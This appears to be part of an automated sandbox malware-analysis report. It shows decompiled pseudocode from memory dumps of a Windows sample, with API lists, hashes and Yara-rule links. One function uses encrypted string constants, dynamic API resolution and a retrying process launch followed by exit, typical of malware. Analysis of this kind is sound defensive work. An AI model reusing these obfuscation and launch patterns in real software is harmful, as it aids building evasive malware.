				struct _WIN32_FIND_DATAW _v608;
				char _v609;
				intOrPtr* _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				union _FINDEX_INFO_LEVELS _v628;
				signed int _v632;
				union _FINDEX_INFO_LEVELS _v636;
				union _FINDEX_INFO_LEVELS _v640;
				signed int _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				signed int _v668;
				union _FINDEX_INFO_LEVELS _v672;
				union _FINDEX_INFO_LEVELS _v676;
				intOrPtr _v724;
				intOrPtr* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t150;
				signed int _t152;
				intOrPtr _t153;
				signed int _t157;
				signed int _t159;
				signed int _t164;
				signed int _t166;
				char _t168;
				signed char _t169;
				signed int _t175;
				union _FINDEX_INFO_LEVELS _t179;
				signed int _t185;
				union _FINDEX_INFO_LEVELS _t188;
				union _FINDEX_INFO_LEVELS _t190;
				intOrPtr* _t195;
				signed int _t198;
				intOrPtr _t203;
				signed int _t205;
				signed int _t208;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				signed int _t214;
				signed int _t216;
				signed int _t217;
				signed int* _t218;
				signed int _t221;
				void* _t224;
				union _FINDEX_INFO_LEVELS _t225;
				intOrPtr _t228;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t235;
				intOrPtr* _t238;
				signed int _t240;
				intOrPtr* _t243;
				signed int _t248;
				signed int _t254;
				signed int _t256;
				signed int _t262;
				intOrPtr* _t263;
				signed int _t271;
				signed int _t273;
				intOrPtr* _t274;
				void* _t276;
				intOrPtr* _t277;
				signed int _t280;
				signed int _t283;
				signed int _t285;
				intOrPtr _t287;
				signed int* _t292;
				signed int _t293;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t299;
				void* _t300;
				void* _t301;
				signed int _t303;
				void* _t307;
				signed int _t308;
				void* _t309;
				void* _t310;
				void* _t311;
				signed int _t312;
				void* _t313;
				void* _t314;

				_t131 = _a8;
				_t310 = _t309 - 0x28;
				_t318 = _t131;
				if(_t131 != 0) {
					_t292 = _a4;
					_t221 = 0;
					 *_t131 = 0;
					_t283 = 0;
					_t132 =  *_t292;
					_t231 = 0;
					_v608.cAlternateFileName = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L9:
						_v8 = _t221;
						_t134 = _t231 - _t283;
						_t293 = _t283;
						_v12 = _t293;
						_t270 = (_t134 >> 2) + 1;
						_t136 = _t134 + 3 >> 2;
						__eflags = _t231 - _t293;
						_v16 = (_t134 >> 2) + 1;
						asm("sbb esi, esi");
						_t295 =  !_t293 & _t134 + 0x00000003 >> 0x00000002;
						__eflags = _t295;
						if(_t295 != 0) {
							_t212 = _t283;
							_t280 = _t221;
							do {
								_t263 =  *_t212;
								_t20 = _t263 + 1; // 0x1
								_v20 = _t20;
								do {
									_t214 =  *_t263;
									_t263 = _t263 + 1;
									__eflags = _t214;
								} while (_t214 != 0);
								_t221 = _t221 + 1 + _t263 - _v20;
								_t212 = _v12 + 4;
								_t280 = _t280 + 1;
								_v12 = _t212;
								__eflags = _t280 - _t295;
							} while (_t280 != _t295);
							_t270 = _v16;
							_v8 = _t221;
							_t221 = 0;
							__eflags = 0;
						}
						_t296 = E00422AD4(_t136, _t270, _v8, 1);
						_t311 = _t310 + 0xc;
						__eflags = _t296;
						if(_t296 != 0) {
							_v12 = _t283;
							_t139 = _t296 + _v16 * 4;
							_t232 = _t139;
							_v28 = _t139;
							_t140 = _t283;
							_v16 = _t232;
							__eflags = _t140 - _v40;
							if(_t140 == _v40) {
								L24:
								_v12 = _t221;
								 *_a8 = _t296;
								_t297 = _t221;
								goto L25;
							} else {
								_t273 = _t296 - _t283;
								__eflags = _t273;
								_v32 = _t273;
								do {
									_t150 =  *_t140;
									_t274 = _t150;
									_v24 = _t150;
									_v20 = _t274 + 1;
									do {
										_t152 =  *_t274;
										_t274 = _t274 + 1;
										__eflags = _t152;
									} while (_t152 != 0);
									_t153 = _t274 - _v20 + 1;
									_push(_t153);
									_v20 = _t153;
									_t157 = E004331AA(_t232, _v28 - _t232 + _v8, _v24);
									_t311 = _t311 + 0x10;
									__eflags = _t157;
									if(_t157 != 0) {
										_push(_t221);
										_push(_t221);
										_push(_t221);
										_push(_t221);
										_push(_t221);
										E0041A842();
										asm("int3");
										_t307 = _t311;
										_push(_t232);
										_t238 = _v72;
										_t65 = _t238 + 1; // 0x1
										_t276 = _t65;
										do {
											_t159 =  *_t238;
											_t238 = _t238 + 1;
											__eflags = _t159;
										} while (_t159 != 0);
										_push(_t283);
										_t285 = _a8;
										_t240 = _t238 - _t276 + 1;
										_v12 = _t240;
										__eflags = _t240 -  !_t285;
										if(_t240 <=  !_t285) {
											_push(_t221);
											_push(_t296);
											_t68 = _t285 + 1; // 0x1
											_t224 = _t68 + _t240;
											_t300 = E00420EFE(_t224, 1);
											__eflags = _t285;
											if(_t285 == 0) {
												L40:
												_push(_v12);
												_t224 = _t224 - _t285;
												_t164 = E004331AA(_t300 + _t285, _t224, _v0);
												_t312 = _t311 + 0x10;
												__eflags = _t164;
												if(_t164 != 0) {
													goto L45;
												} else {
													_t228 = _a12;
													_t205 = E0042CC5D(_t228);
													_v12 = _t205;
													__eflags = _t205;
													if(_t205 == 0) {
														 *( *(_t228 + 4)) = _t300;
														_t303 = 0;
														_t77 = _t228 + 4;
														 *_t77 =  *(_t228 + 4) + 4;
														__eflags =  *_t77;
													} else {
														E004214E2(_t300);
														_t303 = _v12;
													}
													E004214E2(0);
													_t208 = _t303;
													goto L37;
												}
											} else {
												_push(_t285);
												_t210 = E004331AA(_t300, _t224, _a4);
												_t312 = _t311 + 0x10;
												__eflags = _t210;
												if(_t210 != 0) {
													L45:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E0041A842();
													asm("int3");
													_push(_t307);
													_t308 = _t312;
													_t313 = _t312 - 0x298;
													_t166 =  *0x44b6b4; // 0x4a5cc10f
													_v124 = _t166 ^ _t308;
													_t243 = _v108;
													_t277 = _v104;
													_push(_t224);
													_push(0);
													_t287 = _v112;
													_v724 = _t277;
													__eflags = _t243 - _t287;
													if(_t243 != _t287) {
														while(1) {
															_t203 =  *_t243;
															__eflags = _t203 - 0x2f;
															if(_t203 == 0x2f) {
																break;
															}
															__eflags = _t203 - 0x5c;
															if(_t203 != 0x5c) {
																__eflags = _t203 - 0x3a;
																if(_t203 != 0x3a) {
																	_t243 = E00434BF0(_t287, _t243);
																	__eflags = _t243 - _t287;
																	if(_t243 != _t287) {
																		continue;
																	}
																}
															}
															break;
														}
														_t277 = _v616;
													}
													_t168 =  *_t243;
													_v609 = _t168;
													__eflags = _t168 - 0x3a;
													if(_t168 != 0x3a) {
														L56:
														_t225 = 0;
														__eflags = _t168 - 0x2f;
														if(__eflags == 0) {
															L59:
															_t169 = 1;
														} else {
															__eflags = _t168 - 0x5c;
															if(__eflags == 0) {
																goto L59;
															} else {
																__eflags = _t168 - 0x3a;
																_t169 = 0;
																if(__eflags == 0) {
																	goto L59;
																}
															}
														}
														_v676 = _t225;
														_v672 = _t225;
														_push(_t300);
														asm("sbb eax, eax");
														_v668 = _t225;
														_v664 = _t225;
														_v644 =  ~(_t169 & 0x000000ff) & _t243 - _t287 + 0x00000001;
														_v660 = _t225;
														_v656 = _t225;
														_t175 = E004220F1(_t243 - _t287 + 1, _t287,  &_v676, E0042943C(_t277, __eflags));
														_t314 = _t313 + 0xc;
														asm("sbb eax, eax");
														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t225,  &_v608, _t225, _t225, _t225);
														_t301 = _t179;
														__eflags = _t301 - 0xffffffff;
														if(_t301 != 0xffffffff) {
															_t248 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
															__eflags = _t248;
															_v648 = _t248 >> 2;
															do {
																_v640 = _t225;
																_v636 = _t225;
																_v632 = _t225;
																_v628 = _t225;
																_v624 = _t225;
																_v620 = _t225;
																_t185 = E0042C63B( &(_v608.cFileName),  &_v640,  &_v609, E0042943C(_t277, __eflags));
																_t314 = _t314 + 0x10;
																asm("sbb eax, eax");
																_t188 =  !( ~_t185) & _v632;
																__eflags =  *_t188 - 0x2e;
																if( *_t188 != 0x2e) {
																	L67:
																	_push(_v616);
																	_push(_v644);
																	_push(_t287);
																	_push(_t188);
																	L33();
																	_t314 = _t314 + 0x10;
																	_v652 = _t188;
																	__eflags = _t188;
																	if(_t188 != 0) {
																		__eflags = _v620 - _t225;
																		if(_v620 != _t225) {
																			E004214E2(_v632);
																			_t188 = _v652;
																		}
																		_t225 = _t188;
																	} else {
																		goto L68;
																	}
																} else {
																	_t254 =  *((intOrPtr*)(_t188 + 1));
																	__eflags = _t254;
																	if(_t254 == 0) {
																		goto L68;
																	} else {
																		__eflags = _t254 - 0x2e;
																		if(_t254 != 0x2e) {
																			goto L67;
																		} else {
																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t225;
																			if( *((intOrPtr*)(_t188 + 2)) == _t225) {
																				goto L68;
																			} else {
																				goto L67;
																			}
																		}
																	}
																}
																L76:
																FindClose(_t301);
																goto L77;
																L68:
																__eflags = _v620 - _t225;
																if(_v620 != _t225) {
																	E004214E2(_v632);
																}
																__eflags = FindNextFileW(_t301,  &_v608);
															} while (__eflags != 0);
															_t195 = _v616;
															_t256 = _v648;
															_t278 =  *_t195;
															_t198 =  *((intOrPtr*)(_t195 + 4)) -  *_t195 >> 2;
															__eflags = _t256 - _t198;
															if(_t256 != _t198) {
																E00434760(_t278 + _t256 * 4, _t198 - _t256, 4, E0042C623);
															}
															goto L76;
														} else {
															_push(_v616);
															_push(_t225);
															_push(_t225);
															_push(_t287);
															L33();
															_t225 = _t179;
														}
														L77:
														__eflags = _v656;
														if(_v656 != 0) {
															E004214E2(_v668);
														}
														_t190 = _t225;
													} else {
														_t190 = _t287 + 1;
														__eflags = _t243 - _t190;
														if(_t243 == _t190) {
															_t168 = _v609;
															goto L56;
														} else {
															_push(_t277);
															_push(0);
															_push(0);
															_push(_t287);
															L33();
														}
													}
													__eflags = _v16 ^ _t308;
													E00415A87();
													return _t190;
												} else {
													goto L40;
												}
											}
										} else {
											_t208 = 0xc;
											L37:
											return _t208;
										}
									} else {
										goto L23;
									}
									goto L81;
									L23:
									_t211 = _v12;
									_t262 = _v16;
									 *((intOrPtr*)(_v32 + _t211)) = _t262;
									_t140 = _t211 + 4;
									_t232 = _t262 + _v20;
									_v16 = _t232;
									_v12 = _t140;
									__eflags = _t140 - _v40;
								} while (_t140 != _v40);
								goto L24;
							}
						} else {
							_t297 = _t296 | 0xffffffff;
							_v12 = _t297;
							L25:
							E004214E2(_t221);
							_pop(_t233);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t221;
							_t216 = E00434BB0(_t132,  &_v8);
							_t233 =  *_t292;
							__eflags = _t216;
							if(_t216 != 0) {
								_push( &(_v608.cAlternateFileName));
								_push(_t216);
								_push(_t233);
								L46();
								_t310 = _t310 + 0xc;
								_v12 = _t216;
								_t297 = _t216;
							} else {
								_t217 =  &(_v608.cAlternateFileName);
								_push(_t217);
								_push(_t221);
								_push(_t221);
								_push(_t233);
								L33();
								_t297 = _t217;
								_t310 = _t310 + 0x10;
								_v12 = _t297;
							}
							__eflags = _t297;
							if(_t297 != 0) {
								break;
							}
							_t292 =  &(_a4[1]);
							_a4 = _t292;
							_t132 =  *_t292;
							__eflags = _t132;
							if(_t132 != 0) {
								continue;
							} else {
								_t283 = _v608.cAlternateFileName;
								_t231 = _v40;
								goto L9;
							}
							goto L81;
						}
						_t283 = _v608.cAlternateFileName;
						L26:
						_t271 = _t283;
						_v32 = _t271;
						__eflags = _v40 - _t271;
						asm("sbb ecx, ecx");
						_t235 =  !_t233 & _v40 - _t271 + 0x00000003 >> 0x00000002;
						__eflags = _t235;
						_v28 = _t235;
						if(_t235 != 0) {
							_t299 = _t235;
							do {
								E004214E2( *_t283);
								_t221 = _t221 + 1;
								_t283 = _t283 + 4;
								__eflags = _t221 - _t299;
							} while (_t221 != _t299);
							_t283 = _v608.cAlternateFileName;
							_t297 = _v12;
						}
						E004214E2(_t283);
						goto L31;
					}
				} else {
					_t218 = E0041A8EF(_t318);
					_t297 = 0x16;
					 *_t218 = _t297;
					E0041A815();
					L31:
					return _t297;
				}
				L81:
			}

0x0042c70f
0x0042c712
0x0042c716
0x0042c718
0x0042c72e
0x0042c732
0x0042c735
0x0042c737
0x0042c739
0x0042c73b
0x0042c73d
0x0042c740
0x0042c743
0x0042c746
0x0042c748
0x0042c7ab
0x0042c7ad
0x0042c7b0
0x0042c7b2
0x0042c7b6
0x0042c7bf
0x0042c7c0
0x0042c7c3
0x0042c7c5
0x0042c7c8
0x0042c7cc
0x0042c7cc
0x0042c7ce
0x0042c7d0
0x0042c7d2
0x0042c7d4
0x0042c7d4
0x0042c7d6
0x0042c7d9
0x0042c7dc
0x0042c7dc
0x0042c7de
0x0042c7df
0x0042c7df
0x0042c7ea
0x0042c7ec
0x0042c7ef
0x0042c7f0
0x0042c7f3
0x0042c7f3
0x0042c7f7
0x0042c7fa
0x0042c7fd
0x0042c7fd
0x0042c7fd
0x0042c80a
0x0042c80c
0x0042c80f
0x0042c811
0x0042c829
0x0042c82c
0x0042c82f
0x0042c831
0x0042c834
0x0042c836
0x0042c839
0x0042c83c
0x0042c899
0x0042c89c
0x0042c89f
0x0042c8a1
0x00000000
0x0042c83e
0x0042c840
0x0042c840
0x0042c842
0x0042c845
0x0042c845
0x0042c847
0x0042c849
0x0042c84f
0x0042c852
0x0042c852
0x0042c854
0x0042c855
0x0042c855
0x0042c85c
0x0042c85f
0x0042c863
0x0042c870
0x0042c875
0x0042c878
0x0042c87a
0x0042c8f0
0x0042c8f1
0x0042c8f2
0x0042c8f3
0x0042c8f4
0x0042c8f5
0x0042c8fa
0x0042c8fe
0x0042c900
0x0042c901
0x0042c904
0x0042c904
0x0042c907
0x0042c907
0x0042c909
0x0042c90a
0x0042c90a
0x0042c90e
0x0042c90f
0x0042c916
0x0042c919
0x0042c91c
0x0042c91e
0x0042c928
0x0042c929
0x0042c92a
0x0042c92d
0x0042c937
0x0042c93b
0x0042c93d
0x0042c951
0x0042c951
0x0042c954
0x0042c95e
0x0042c963
0x0042c966
0x0042c968
0x00000000
0x0042c96a
0x0042c96a
0x0042c96f
0x0042c976
0x0042c979
0x0042c97b
0x0042c98c
0x0042c98e
0x0042c990
0x0042c990
0x0042c990
0x0042c97d
0x0042c97e
0x0042c983
0x0042c986
0x0042c995
0x0042c99b
0x00000000
0x0042c99e
0x0042c93f
0x0042c93f
0x0042c945
0x0042c94a
0x0042c94d
0x0042c94f
0x0042c9a1
0x0042c9a3
0x0042c9a4
0x0042c9a5
0x0042c9a6
0x0042c9a7
0x0042c9a8
0x0042c9ad
0x0042c9b0
0x0042c9b1
0x0042c9b3
0x0042c9b9
0x0042c9c0
0x0042c9c3
0x0042c9c6
0x0042c9c9
0x0042c9ca
0x0042c9cb
0x0042c9ce
0x0042c9d4
0x0042c9d6
0x0042c9d8
0x0042c9d8
0x0042c9da
0x0042c9dc
0x00000000
0x00000000
0x0042c9de
0x0042c9e0
0x0042c9e2
0x0042c9e4
0x0042c9ef
0x0042c9f1
0x0042c9f3
0x00000000
0x00000000
0x0042c9f3
0x0042c9e4
0x00000000
0x0042c9e0
0x0042c9f5
0x0042c9f5
0x0042c9fb
0x0042c9fd
0x0042ca03
0x0042ca05
0x0042ca27
0x0042ca27
0x0042ca29
0x0042ca2b
0x0042ca37
0x0042ca37
0x0042ca2d
0x0042ca2d
0x0042ca2f
0x00000000
0x0042ca31
0x0042ca31
0x0042ca33
0x0042ca35
0x00000000
0x00000000
0x0042ca35
0x0042ca2f
0x0042ca3f
0x0042ca47
0x0042ca4d
0x0042ca4e
0x0042ca50
0x0042ca58
0x0042ca5e
0x0042ca64
0x0042ca6a
0x0042ca7e
0x0042ca83
0x0042ca8e
0x0042ca9e
0x0042caa4
0x0042caa6
0x0042caa9
0x0042cacc
0x0042cacc
0x0042cad1
0x0042cad7
0x0042cad7
0x0042cadd
0x0042cae3
0x0042cae9
0x0042caef
0x0042caf5
0x0042cb16
0x0042cb1b
0x0042cb20
0x0042cb24
0x0042cb2a
0x0042cb2d
0x0042cb40
0x0042cb40
0x0042cb46
0x0042cb4c
0x0042cb4d
0x0042cb4e
0x0042cb53
0x0042cb56
0x0042cb5c
0x0042cb5e
0x0042cbbc
0x0042cbc2
0x0042cbca
0x0042cbcf
0x0042cbd5
0x0042cbd6
0x00000000
0x00000000
0x00000000
0x0042cb2f
0x0042cb2f
0x0042cb32
0x0042cb34
0x00000000
0x0042cb36
0x0042cb36
0x0042cb39
0x00000000
0x0042cb3b
0x0042cb3b
0x0042cb3e
0x00000000
0x00000000
0x00000000
0x00000000
0x0042cb3e
0x0042cb39
0x0042cb34
0x0042cbd8
0x0042cbd9
0x00000000
0x0042cb60
0x0042cb60
0x0042cb66
0x0042cb6e
0x0042cb73
0x0042cb82
0x0042cb82
0x0042cb8a
0x0042cb90
0x0042cb96
0x0042cb9d
0x0042cba0
0x0042cba2
0x0042cbb2
0x0042cbb7
0x00000000
0x0042caab
0x0042caab
0x0042cab1
0x0042cab2
0x0042cab3
0x0042cab4
0x0042cabc
0x0042cabc
0x0042cbdf
0x0042cbdf
0x0042cbe7
0x0042cbef
0x0042cbf4
0x0042cbf5
0x0042ca07
0x0042ca07
0x0042ca0a
0x0042ca0c
0x0042ca21
0x00000000
0x0042ca0e
0x0042ca0e
0x0042ca11
0x0042ca12
0x0042ca13
0x0042ca14
0x0042ca19
0x0042ca0c
0x0042cbfb
0x0042cbfe
0x0042cc06
0x00000000
0x00000000
0x00000000
0x0042c94f
0x0042c920
0x0042c922
0x0042c923
0x0042c927
0x0042c927
0x00000000
0x00000000
0x00000000
0x00000000
0x0042c87c
0x0042c87c
0x0042c882
0x0042c885
0x0042c888
0x0042c88b
0x0042c88e
0x0042c891
0x0042c894
0x0042c894
0x00000000
0x0042c845
0x0042c813
0x0042c813
0x0042c816
0x0042c8a3
0x0042c8a4
0x0042c8a9
0x00000000
0x0042c8a9
0x0042c74a
0x0042c74a
0x0042c74d
0x0042c755
0x0042c758
0x0042c75f
0x0042c761
0x0042c763
0x0042c77e
0x0042c77f
0x0042c780
0x0042c781
0x0042c786
0x0042c789
0x0042c78c
0x0042c765
0x0042c765
0x0042c768
0x0042c769
0x0042c76a
0x0042c76b
0x0042c76c
0x0042c771
0x0042c773
0x0042c776
0x0042c776
0x0042c78e
0x0042c790
0x00000000
0x00000000
0x0042c799
0x0042c79c
0x0042c79f
0x0042c7a1
0x0042c7a3
0x00000000
0x0042c7a5
0x0042c7a5
0x0042c7a8
0x00000000
0x0042c7a8
0x00000000
0x0042c7a3
0x0042c81e
0x0042c8aa
0x0042c8ad
0x0042c8b1
0x0042c8ba
0x0042c8bd
0x0042c8c1
0x0042c8c1
0x0042c8c3
0x0042c8c6
0x0042c8c8
0x0042c8ca
0x0042c8cc
0x0042c8d1
0x0042c8d2
0x0042c8d6
0x0042c8d6
0x0042c8da
0x0042c8dd
0x0042c8dd
0x0042c8e1
0x00000000
0x0042c8e8
0x0042c71a
0x0042c71a
0x0042c721
0x0042c722
0x0042c724
0x0042c8e9
0x0042c8ef
0x0042c8ef
0x00000000

APIs

_strpbrk.LIBCMT ref: 0042C758

Part of subcall function 00422AD4: _free.LIBCMT ref: 00422B12

_free.LIBCMT ref: 0042C8A4

Part of subcall function 004214E2: HeapFree.KERNEL32(00000000,00000000), ref: 004214F8
Part of subcall function 004214E2: GetLastError.KERNEL32(?,?,0042E280,?,00000000,?,?,?,0042E525,?,00000007,?,?,0042E964,?,?), ref: 0042150A

_free.LIBCMT ref: 0042C8CC
_free.LIBCMT ref: 0042C8E1

Part of subcall function 0041A842: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0041A844
Part of subcall function 0041A842: GetCurrentProcess.KERNEL32(C0000417,?,0041370C), ref: 0041A867
Part of subcall function 0041A842: TerminateProcess.KERNEL32(00000000,?,0041370C), ref: 0041A86E

Part of subcall function 0042C8FB: FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042CA9E

Strings

*?, xrefs: 0042C74D

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: _free$Process$CurrentErrorFeatureFileFindFirstFreeHeapLastPresentProcessorTerminate_strpbrk
String ID: *?
API String ID: 911097836-2564092906
Opcode ID: 75015567ee74457a415fabb660a5f8dc3321371935ca65f1633c483b9476b323
Instruction ID: 14aa936b33456844b950128f50c5193d9ab54d094cbb505d3339466a5e62cb99
Opcode Fuzzy Hash: 75015567ee74457a415fabb660a5f8dc3321371935ca65f1633c483b9476b323
Instruction Fuzzy Hash: 86614EB5E002299FDB14DFA9D8819EEFBF5EF48310B64816AE805E7300D775AE41CB94

Uniqueness

Uniqueness Score: 100.00%

Function 0042C70A, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207UNIQUE

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 0042C758

Part of subcall function 00422AD4: _free.LIBCMT ref: 00422B12

_free.LIBCMT ref: 0042C8A4

Part of subcall function 004214E2: HeapFree.KERNEL32(00000000,00000000), ref: 004214F8
Part of subcall function 004214E2: GetLastError.KERNEL32(?,?,00422FA2), ref: 0042150A

_free.LIBCMT ref: 0042C8CC
_free.LIBCMT ref: 0042C8E1

Part of subcall function 0042C8FB: FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?), ref: 0042CA9E

Strings

*?, xrefs: 0042C74D

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: _free$ErrorFileFindFirstFreeHeapLast_strpbrk
String ID: *?
API String ID: 4216130989-2564092906
Opcode ID: fe5461b52c3efeeb2350939f6ac65e29fd68336ff5be62c666029f08c07ac63e
Instruction ID: 14aa936b33456844b950128f50c5193d9ab54d094cbb505d3339466a5e62cb99
Opcode Fuzzy Hash: fe5461b52c3efeeb2350939f6ac65e29fd68336ff5be62c666029f08c07ac63e
Instruction Fuzzy Hash: 86614EB5E002299FDB14DFA9D8819EEFBF5EF48310B64816AE805E7300D775AE41CB94

Uniqueness

Uniqueness Score: 100.00%

Function 00403BC6, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 138
synchronizationUNIQUE

Download Yara Rule

C-Code - Quality: 79%

			E00403BC6(void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				char _v220;
				char _v236;
				char _v748;
				short _v1772;
				void* __ebx;
				void* _t77;
				intOrPtr* _t78;
				void* _t96;
				intOrPtr _t108;
				int _t109;
				intOrPtr* _t111;
				intOrPtr* _t112;

				_v120 = 0x3ec4f02f;
				_v116 = 0x743699b;
				_v112 = 0x311d6f6b;
				_v108 = 0x8ca7450d;
				_v104 = 0xc6a1ee9d;
				_v100 = 0xc6a1eea5;
				_v96 = 0xeee60340;
				_v92 = 0xb70e2ae6;
				_v88 = 0x9016c592;
				_v84 = 0x19f9df85;
				_v80 = 0xa3bea692;
				_v76 = 0x82301b0;
				_v72 = 0xa42bfaef;
				_v68 = 0x32f595e3;
				_v64 = 0xd1e8be56;
				_v60 = 0x65ff7fde;
				_v56 = 0x617a9e52;
				_v52 = 0x766bbe5c;
				_v48 = 0xfc99fa71;
				_v44 = 0x617fd12b;
				_t77 = E00407563( &_v120);
				 *_t112 = 0x23ebe99d;
				_t78 = E004010BB(_t96);
				 *_t78(_t77,  &_v748, 0xff, 1);
				_v220 = 0x205773dd;
				_v216 = 0x6de6b053;
				_v212 = 0xf59ee5ff;
				_v208 = 0xed78db37;
				_v204 = 0x977e5f86;
				_v200 = 0x977e5fca;
				_v196 = 0xf1cc5105;
				_v192 = 0xa47568cf;
				_v188 = 0xbe9d46d7;
				_v184 = 0x81332c3b;
				_v180 = 0xdef8d752;
				_v176 = 0x8f928562;
				_v172 = 0xff83a728;
				_v168 = 0x3e58acc7;
				_v164 = 0x410c3ee;
				_v160 = 0xbf99b167;
				_v156 = 0x232a6921;
				_v152 = 0x3a7696c1;
				_v148 = 0xa0b77555;
				_v144 = 0xa05bfe2e;
				_v140 = 0xd6cbcfbd;
				_v136 = 0x1b32045d;
				_v132 = 0xb6d091a8;
				_v128 = 0x986c9b46;
				_v124 = 0xbe1b9131;
				wsprintfW( &_v1772, E00407563( &_v220), _a4);
				E00405C38( &_v236, 0x3d);
				_t108 = 0x3c;
				_t111 = E00405C7D( &_v236, _t108);
				 *_t111 = _t108;
				 *((intOrPtr*)(_t111 + 4)) = 0x40;
				 *((intOrPtr*)(_t111 + 8)) =  *((intOrPtr*)(E004010BB(_t96, 3, 0xcacd450)))();
				_v40 = 0xc5a126f0;
				_v36 = 0x32802df6;
				_v32 = 0xbfd94e25;
				_v28 = 0x83ad84c;
				_v24 = 0xa355e1af;
				_v20 = 0xa355e1a3;
				_v16 = 0x4d5a55c6;
				_v12 = 0xfc468bae;
				_v8 = 0x538bff25;
				 *((intOrPtr*)(_t111 + 0xc)) = E00407563( &_v40);
				 *((intOrPtr*)(_t111 + 0x18)) = 0;
				 *((intOrPtr*)(_t111 + 0x10)) =  &_v748;
				_t109 = 0;
				 *((intOrPtr*)(_t111 + 0x1c)) = 0;
				 *((intOrPtr*)(_t111 + 0x14)) =  &_v1772;
				 *((intOrPtr*)(_t111 + 0x20)) = 0;
				while(E00401AE3(_t111) == 0) {
					_t109 = _t109 + 1;
					if(_t109 < 0x64) {
						continue;
					}
					return E00405C6C( &_v236);
				}
				WaitForSingleObject( *(_t111 + 0x38), 0xffffffff);
				CloseHandle( *(_t111 + 0x38));
				ExitProcess(0);
			}

0x00403bd4
0x00403bdd
0x00403be4
0x00403beb
0x00403bf2
0x00403bf9
0x00403c00
0x00403c07
0x00403c0e
0x00403c15
0x00403c1c
0x00403c23
0x00403c2a
0x00403c31
0x00403c38
0x00403c3f
0x00403c46
0x00403c4d
0x00403c54
0x00403c5b
0x00403c62
0x00403c67
0x00403c72
0x00403c86
0x00403c8e
0x00403c99
0x00403ca3
0x00403cad
0x00403cb7
0x00403cc1
0x00403ccb
0x00403cd5
0x00403cdf
0x00403ce9
0x00403cf3
0x00403cfd
0x00403d07
0x00403d11
0x00403d1b
0x00403d25
0x00403d2f
0x00403d39
0x00403d43
0x00403d4d
0x00403d57
0x00403d61
0x00403d6b
0x00403d72
0x00403d79
0x00403d90
0x00403da1
0x00403da8
0x00403db5
0x00403db7
0x00403dc0
0x00403dd0
0x00403dd7
0x00403dde
0x00403de5
0x00403dec
0x00403df3
0x00403dfa
0x00403e01
0x00403e08
0x00403e0f
0x00403e1b
0x00403e26
0x00403e29
0x00403e2c
0x00403e34
0x00403e38
0x00403e3b
0x00403e3e
0x00403e49
0x00403e4d
0x00000000
0x00000000
0x00403e60
0x00403e60
0x00403e66
0x00403e6f
0x00403e76

APIs

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

wsprintfW.USER32 ref: 00403D90

Part of subcall function 00405C38: VirtualAlloc.KERNELBASE(00000000,0040C0AD,00003000,00000040,00000000,?,?,0040C0AD,?,?,?,?,?,?,?,0040165A), ref: 00405C55

Part of subcall function 00405C6C: VirtualFree.KERNELBASE(?,00000000,00008000,0040C1A3,?,?,?,?,?,?,0040165A,00000000,00000020,00000001,00000000), ref: 00405C76

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00403E66
CloseHandle.KERNEL32(?), ref: 00403E6F
ExitProcess.KERNEL32 ref: 00403E76

Strings

!i*#, xrefs: 00403D2F

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

